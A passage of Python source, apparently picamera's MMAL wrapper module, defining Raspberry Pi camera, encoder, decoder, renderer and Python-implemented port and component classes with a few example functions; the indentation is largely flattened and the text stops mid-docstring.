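# preview output to a renderer with an MMALConnection. It assumes a Raspberry
# Pi with the firmware camera attached and is wrapped in a function so that
# importing this file touches no hardware; the 5 second preview is arbitrary.
def _example_camera_preview():
    import time
    camera = MMALCamera()
    renderer = MMALRenderer()
    # Configure the preview output (port 0) before connecting it
    camera.outputs[0].framesize = (640, 480)
    camera.outputs[0].framerate = 30
    camera.outputs[0].commit()
    # Negotiate formats and create the underlying MMAL connection
    connection = MMALConnection(camera.outputs[0], renderer.inputs[0])
    connection.enable()
    time.sleep(5)
    connection.disable()
    connection.close()
    renderer.close()
    camera.close()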
class MMALRawCamera(MMALBaseComponent):
"""
The MMAL "raw camera" component.
Don't use this! If you insist on using this anyway, read the forum post
about `raw sensor access`_ first.
    .. _raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
opaque_input_subformats = ()
opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
"""
Represents the MMAL camera component. This component has 0 input ports and
3 output ports. The intended use of the output ports (which in turn
determines the behaviour of those ports) is as follows:
* Port 0 is intended for preview renderers
* Port 1 is intended for video recording
* Port 2 is intended for still image capture
Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
obtain and manipulate the camera's configuration.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')
annotate_structs = (
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
)
def __init__(self):
global FIX_RGB_BGR_ORDER
super(MMALCamera, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
found = False
# try largest struct to smallest as later firmwares still happily
# accept earlier revision structures
# XXX do old firmwares reject too-large structs?
for struct in reversed(MMALCamera.annotate_structs):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
if FIX_RGB_BGR_ORDER is None:
# old firmware lists BGR24 before RGB24 in supported_formats
for f in self.outputs[1].supported_formats:
if f == mmal.MMAL_ENCODING_BGR24:
FIX_RGB_BGR_ORDER = True
break
elif f == mmal.MMAL_ENCODING_RGB24:
FIX_RGB_BGR_ORDER = False
break
def _get_annotate_rev(self):
try:
return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
        except ValueError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
def _set_annotate_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera annotation structure revision")
annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
The annotation capabilities of the firmware have evolved over time and
several structures are available for querying and setting video
annotations. By default the :class:`MMALCamera` class will pick the
latest annotation structure supported by the current firmware but you
can select older revisions with :attr:`annotate_rev` for other purposes
(e.g. testing).
""")
class MMALCameraInfo(MMALBaseComponent):
"""
Represents the MMAL camera-info component. Query the
``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
information about the connected camera module.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO
info_structs = (
mmal.MMAL_PARAMETER_CAMERA_INFO_T,
mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
)
def __init__(self):
super(MMALCameraInfo, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
found = False
# try smallest structure to largest as later firmwares reject
# older structures
for struct in MMALCameraInfo.info_structs:
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _get_info_rev(self):
try:
return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
        except ValueError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _set_info_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera info structure revision")
info_rev = property(_get_info_rev, _set_info_rev, doc="""\
The camera information capabilities of the firmware have evolved over
time and several structures are available for querying camera
information. When initialized, :class:`MMALCameraInfo` will attempt
to discover which structure is in use by the extant firmware. This
property can be used to discover the structure version and to modify
the version in use for other purposes (e.g. testing).
""")
class MMALComponent(MMALBaseComponent):
"""
Represents an MMAL component that acts as a filter of some sort, with a
    single input that connects to an upstream source port. This is an abstract
base class.
"""
__slots__ = ()
def __init__(self):
super(MMALComponent, self).__init__()
assert len(self.opaque_input_subformats) == 1
def close(self):
self.disconnect()
super(MMALComponent, self).close()
def enable(self):
super(MMALComponent, self).enable()
if self.connection is not None:
self.connection.enable()
def disable(self):
if self.connection is not None:
self.connection.disable()
super(MMALComponent, self).disable()
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
            return self.inputs[0].connect(source, **options)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
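# Illustrative sketch (not part of the original module): the component-level
# connect() convenience used to chain components without touching ports
# directly. A real pipeline would also configure framesize, framerate and the
# encoder's output format and bitrate before enabling anything.
def _example_chain_components():
    camera = MMALCamera()
    splitter = MMALSplitter()
    encoder = MMALVideoEncoder()
    splitter.connect(camera)   # camera.outputs[0] -> splitter.inputs[0]
    encoder.connect(splitter)  # first free splitter output -> encoder.inputs[0]
    for component in (encoder, splitter, camera):
        component.close()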
class MMALSplitter(MMALComponent):
"""
Represents the MMAL splitter component. This component has 1 input port
and 4 output ports which all generate duplicates of buffers passed to the
input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
"""
Represents the MMAL ISP resizer component. This component has 1 input port
and 1 output port, and supports resizing via the VideoCore ISP, along with
conversion of numerous formats into numerous other formats (e.g. OPAQUE to
RGB, etc). This is more efficient than :class:`MMALResizer` but is only
available on later firmware versions.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = (None,)
class MMALResizer(MMALComponent):
"""
Represents the MMAL VPU resizer component. This component has 1 input port
and 1 output port. This supports resizing via the VPU. This is not as
efficient as :class:`MMALISPResizer` but is available on all firmware
    versions. The output port can (and usually should) have a different frame
size to the input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
opaque_input_subformats = (None,)
opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
"""
Represents a generic MMAL encoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoEncoder(MMALEncoder):
"""
Represents the MMAL video encoder component. This component has 1 input
port and 1 output port. The output port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
opaque_input_subformats = ('OPQV-dual',)
opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
"""
Represents the MMAL image encoder component. This component has 1 input
port and 1 output port. The output port is typically configured with
``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
``MMAL_ENCODING_GIF``, etc.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
opaque_input_subformats = ('OPQV-strips',)
opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
"""
Represents a generic MMAL decoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoDecoder(MMALDecoder):
"""
Represents the MMAL video decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
"""
    Represents the MMAL image decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_JPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
"""
Represents the MMAL renderer component. This component has 1 input port and
0 output ports. It is used to implement the camera preview and overlays.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
"""
Represents the MMAL null-sink component. This component has 1 input port
and 0 output ports. It is used to keep the preview port "alive" (and thus
calculating white-balance and exposure) when the camera preview is not
required.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
"""
Implements ports for Python-based MMAL components.
"""
__slots__ = (
'_buffer_count',
'_buffer_size',
'_connection',
'_enabled',
'_owner',
'_pool',
'_type',
'_index',
'_supported_formats',
'_format',
'_callback',
)
_FORMAT_BPP = {
'I420': 1.5,
'RGB3': 3,
'RGBA': 4,
'BGR3': 3,
'BGRA': 4,
}
def __init__(self, owner, port_type, index):
self._buffer_count = 2
self._buffer_size = 0
self._connection = None
self._enabled = False
self._owner = weakref.ref(owner)
self._pool = None
self._callback = None
self._type = port_type
self._index = index
self._supported_formats = {
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
type=mmal.MMAL_ES_TYPE_VIDEO,
encoding=mmal.MMAL_ENCODING_I420,
es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
def close(self):
self.disconnect()
self.disable()
self._format = None
def __repr__(self):
return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format), self.buffer_count,
self.buffer_size, self.framesize, self.framerate)
def _get_bitrate(self):
return self._format[0].bitrate
def _set_bitrate(self, value):
self._format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def _get_supported_formats(self):
return self._supported_formats
def _set_supported_formats(self, value):
try:
value = {f for f in value}
except TypeError:
value = {value}
if not value:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "port must have at least one valid format")
self._supported_formats = value
supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
Retrieves or sets the set of valid formats for this port. The set must
always contain at least one valid format. A single format can be
specified; it will be converted implicitly to a singleton set.
If the current port :attr:`format` is not a member of the new set, no
error is raised. An error will be raised when :meth:`commit` is next
called if :attr:`format` is still not a member of the set.
""")
def _get_format(self):
return self._format[0].encoding
def _set_format(self, value):
self._format[0].encoding = value
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
""")
def _get_framesize(self):
return PiResolution(
self._format[0].es[0].video.crop.width,
self._format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the source's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
""")
def _get_framerate(self):
video = self._format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
""")
@property
def pool(self):
"""
        Returns the :class:`MMALPool` associated with the port, if any.
"""
return self._pool
@property
def opaque_subformat(self):
return None
def _get_buffer_count(self):
return self._buffer_count
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._buffer_count = int(value)
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port. The
default is 2 but more may be required in the case of long pipelines
with replicated buffers.
""")
def _get_buffer_size(self):
return self._buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers defaults to a value dictated by the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._format, source._format)
else:
mmal.mmal_format_copy(self._format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers. This is typically called after
adjusting the port's format and/or associated settings (like width and
height for video ports).
"""
if self.format not in self.supported_formats:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
self._buffer_count = 2
video = self._format[0].es[0].video
try:
self._buffer_size = int(
MMALPythonPort._FORMAT_BPP[str(self.format)]
* video.width
* video.height)
except KeyError:
# If it's an unknown / encoded format just leave the buffer size
# alone and hope the owning component knows what to set
pass
self._owner()._commit_port(self)
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return self._enabled
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
if self._connection is not None:
if callback is not None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'connected ports must be enabled without callback')
else:
if callback is None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'unconnected ports must be enabled with callback')
if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
self._pool = MMALPythonPortPool(self)
self._callback = callback
self._enabled = True
def disable(self):
"""
Disable the port.
"""
self._enabled = False
if self._pool is not None:
# Release any unprocessed buffers from the owner's queue before
# we destroy them all
while True:
buf = self._owner()._queue.get(False)
if buf:
buf.release()
else:
break
self._pool.close()
self._pool = None
self._callback = None
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self._enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
if self._pool is not None:
# Unconnected port or input port case; retrieve buffer from the
# allocated pool
return self._pool.get_buffer(block, timeout)
else:
# Connected output port case; get a buffer from the target input
# port (in this case the port is just a thin proxy for the
# corresponding input port)
assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
return self._connection.target.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
# NOTE: The MMALPythonConnection callback must occur *before* the test
# for the port being enabled; it's meant to be the connection making
# the callback prior to the buffer getting to the port after all
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
                if modified_buf is None:
                    buf.release()
                    return
else:
buf = modified_buf
if not self._enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
if self._callback is not None:
            try:
                # XXX Return value? If it's an input port we should ignore it,
                # but what about output ports?
self._callback(self, buf)
except:
buf.release()
raise
if self._type == mmal.MMAL_PORT_TYPE_INPUT:
# Input port case; queue the buffer for processing on the
# owning component
self._owner()._queue.put(buf)
elif self._connection is None:
# Unconnected output port case; release the buffer back to the
# pool
buf.release()
else:
# Connected output port case; forward the buffer to the
# connected component's input port
# XXX If it's a format-change event?
self._connection.target.send_buffer(buf)
@property
def name(self):
return '%s:%s:%d' % (self._owner().name, {
mmal.MMAL_PORT_TYPE_OUTPUT: 'out',
mmal.MMAL_PORT_TYPE_INPUT: 'in',
mmal.MMAL_PORT_TYPE_CONTROL: 'control',
mmal.MMAL_PORT_TYPE_CLOCK: 'clock',
}[self.type], self._index)
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._index
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection options can be specified as keyword arguments. These
will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
return MMALPythonConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALPythonPortPool(MMALPool):
"""
Creates a pool of buffer headers for an :class:`MMALPythonPort`. This is
only used when a fake port is used without a corresponding
:class:`MMALPythonConnection`.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPythonPortPool, self).__init__(
mmal.mmal_pool_create(port.buffer_count, port.buffer_size))
self._port = port
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_all_buffers(port, block, timeout)
class MMALPythonBaseComponent(MMALObject):
"""
Base class for Python-implemented MMAL components. This class provides the
:meth:`_commit_port` method used by descendents to control their ports'
behaviour, and the :attr:`enabled` property. However, it is unlikely that
users will want to sub-class this directly. See
:class:`MMALPythonComponent` for a more useful starting point.
"""
__slots__ = ('_inputs', '_outputs', '_enabled',)
def __init__(self):
super(MMALPythonBaseComponent, self).__init__()
self._enabled = False
self._inputs = ()
self._outputs = ()
# TODO Control port?
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
self.disable()
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return self._enabled
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
self._enabled = True
def disable(self):
"""
Disables the component.
"""
self._enabled = False
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return None
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
def _commit_port(self, port):
"""
Called by ports when their format is committed. Descendents may
override this to reconfigure output ports when input ports are
committed, or to raise errors if the new port configuration is
unacceptable.
.. warning::
This method must *not* reconfigure input ports when called; however
it can reconfigure *output* ports when input ports are committed.
"""
pass
def __repr__(self):
if self._outputs:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALPythonSource(MMALPythonBaseComponent):
"""
Provides a source for other :class:`MMALComponent` instances. The
specified *input* is read in chunks the size of the configured output
buffer(s) until the input is exhausted. The :meth:`wait` method can be
used to block until this occurs. If the output buffer is configured to
use a full-frame unencoded format (like I420 or RGB), frame-end flags will
be automatically generated by the source. When the input is exhausted an
empty buffer with the End Of Stream (EOS) flag will be sent.
The component provides all picamera's usual IO-handling characteristics; if
*input* is a string, a file with that name will be opened as the input and
closed implicitly when the component is closed. Otherwise, the input will
not be closed implicitly (the component did not open it, so the assumption
is that closing *input* is the caller's responsibility). If *input* is an
object with a ``read`` method it is assumed to be a file-like object and is
used as is. Otherwise, *input* is assumed to be a readable object
supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
stream).
"""
__slots__ = ('_stream', '_opened', '_thread')
def __init__(self, input):
super(MMALPythonSource, self).__init__()
self._inputs = ()
self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
self._stream, self._opened = open_stream(input, output=False)
self._thread = None
def close(self):
super(MMALPythonSource, self).close()
if self._outputs:
self._outputs[0].close()
self._outputs = ()
if self._stream:
close_stream(self._stream, self._opened)
self._stream = None
def enable(self):
super(MMALPythonSource, self).enable()
self._thread = Thread(target=self._send_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonSource, self).disable()
if self._thread:
self._thread.join()
self._thread = None
def wait(self, timeout=None):
"""
Wait for the source to send all bytes from the specified input. If
*timeout* is specified, it is the number of seconds to wait for
completion. The method returns ``True`` if the source completed within
the specified timeout and ``False`` otherwise.
"""
if not self.enabled:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'cannot wait on disabled component')
self._thread.join(timeout)
return not self._thread.is_alive()
def _send_run(self):
# Calculate the size of a frame if possible (i.e. when the output
# format is an unencoded full frame format). If it's an unknown /
# encoded format, we've no idea what the framesize is (this would
# presumably require decoding the stream) so leave framesize as None.
video = self._outputs[0]._format[0].es[0].video
try:
framesize = (
MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
* video.width
* video.height)
except KeyError:
framesize = None
frameleft = framesize
while self.enabled:
buf = self._outputs[0].get_buffer(timeout=0.1)
if buf:
try:
if frameleft is None:
send = buf.size
else:
send = min(frameleft, buf.size)
with buf as data:
if send == buf.size:
try:
# readinto() is by far the fastest method of
# getting data into the buffer
buf.length = self._stream.readinto(data)
except AttributeError:
# if there's no readinto() method, fallback on
# read() and the data setter (memmove)
buf.data = self._stream.read(buf.size)
else:
buf.data = self._stream.read(send)
if frameleft is not None:
frameleft -= buf.length
if not frameleft:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
frameleft = framesize
if not buf.length:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
break
finally:
self._outputs[0].send_buffer(buf)
@property
def name(self):
return 'py.source'
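# Illustrative sketch (not part of the original module): pushing raw I420
# frames from a file through MMALPythonSource into MMALPythonTarget (defined
# further down in this module). The file names and frame size are arbitrary
# example values.
def _example_copy_raw_frames(infile='frames.yuv', outfile='copy.yuv'):
    source = MMALPythonSource(infile)
    target = MMALPythonTarget(outfile)
    source.outputs[0].format = mmal.MMAL_ENCODING_I420
    source.outputs[0].framesize = (640, 480)
    source.outputs[0].commit()
    connection = target.connect(source)
    connection.enable()
    source.enable()
    target.enable()
    source.wait()
    target.wait()
    source.disable()
    target.disable()
    connection.close()
    target.close()
    source.close()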
class MMALPythonComponent(MMALPythonBaseComponent):
"""
Provides a Python-based MMAL component with a *name*, a single input and
the specified number of *outputs* (default 1). The :meth:`connect` and
:meth:`disconnect` methods can be used to establish or break a connection
from the input port to an upstream component.
Typically descendents will override the :meth:`_handle_frame` method to
respond to buffers sent to the input port, and will set
:attr:`MMALPythonPort.supported_formats` in the constructor to define the
formats that the component will work with.
"""
__slots__ = ('_name', '_thread', '_queue', '_error')
def __init__(self, name='py.component', outputs=1):
super(MMALPythonComponent, self).__init__()
self._name = name
self._thread = None
self._error = None
self._queue = MMALQueue.create()
self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
self._outputs = tuple(
MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
for n in range(outputs)
)
def close(self):
super(MMALPythonComponent, self).close()
self.disconnect()
if self._inputs:
self._inputs[0].close()
self._inputs = ()
for output in self._outputs:
output.disable()
self._outputs = ()
self._queue.close()
self._queue = None
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
            return self.inputs[0].connect(source, **options)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
@property
def name(self):
return self._name
def _commit_port(self, port):
"""
        Overridden to copy the input port's configuration to the output
port(s), and to ensure that the output port(s)' format(s) match
the input port's format.
"""
super(MMALPythonComponent, self)._commit_port(port)
if port.type == mmal.MMAL_PORT_TYPE_INPUT:
for output in self.outputs:
output.copy_from(port)
elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
if port.format != self.inputs[0].format:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
def enable(self):
super(MMALPythonComponent, self).enable()
if not self._thread:
self._thread = Thread(target=self._thread_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonComponent, self).disable()
if self._thread:
self._thread.join()
self._thread = None
if self._error:
raise self._error
def _thread_run(self):
try:
while self._enabled:
buf = self._queue.get(timeout=0.1)
if buf:
try:
handler = {
0: self._handle_frame,
mmal.MMAL_EVENT_PARAMETER_CHANGED: self._handle_parameter_changed,
mmal.MMAL_EVENT_FORMAT_CHANGED: self._handle_format_changed,
mmal.MMAL_EVENT_ERROR: self._handle_error,
mmal.MMAL_EVENT_EOS: self._handle_end_of_stream,
}[buf.command]
if handler(self.inputs[0], buf):
self._enabled = False
finally:
buf.release()
except Exception as e:
self._error = e
self._enabled = False
def _handle_frame(self, port, buf):
"""
Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
0).
Typically, if the component has output ports, the method is expected to
fetch a buffer from the output port(s), write data into them, and send
them back to their respective ports.
Return values are as for normal event handlers (``True`` when no more
buffers are expected, ``False`` otherwise).
"""
return False
def _handle_format_changed(self, port, buf):
"""
Handles format change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).
The default implementation re-configures the input port of the
component and emits the event on all output ports for downstream
processing. Override this method if you wish to do something else in
response to format change events.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
